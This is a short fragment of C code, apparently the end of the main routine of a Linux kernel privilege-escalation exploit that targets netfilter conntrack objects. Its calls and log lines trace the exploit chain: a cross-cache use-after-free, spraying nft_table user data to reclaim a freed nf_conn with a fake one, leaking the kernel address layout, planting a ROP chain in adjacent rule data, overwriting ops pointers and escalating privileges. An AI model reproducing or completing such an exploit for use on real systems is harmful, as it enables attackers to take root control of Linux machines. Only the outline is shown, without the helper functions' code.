    cross_cache_post_free();

    INFO("Reclaim the second template nf_conn (kmalloc-256) with nft_table.udata (kmalloc-cg-256)");
    spray_nft_tables_udata_kmalloc_cg_256_fake_nf_conn();
    INFO("II: end CROSS CACHE");

    leak_kaslr();
    update_adjacent_nft_rule_udata_with_ROP();
    update_labels_to_overwrites_ops();
    escalate();

    return 0;
}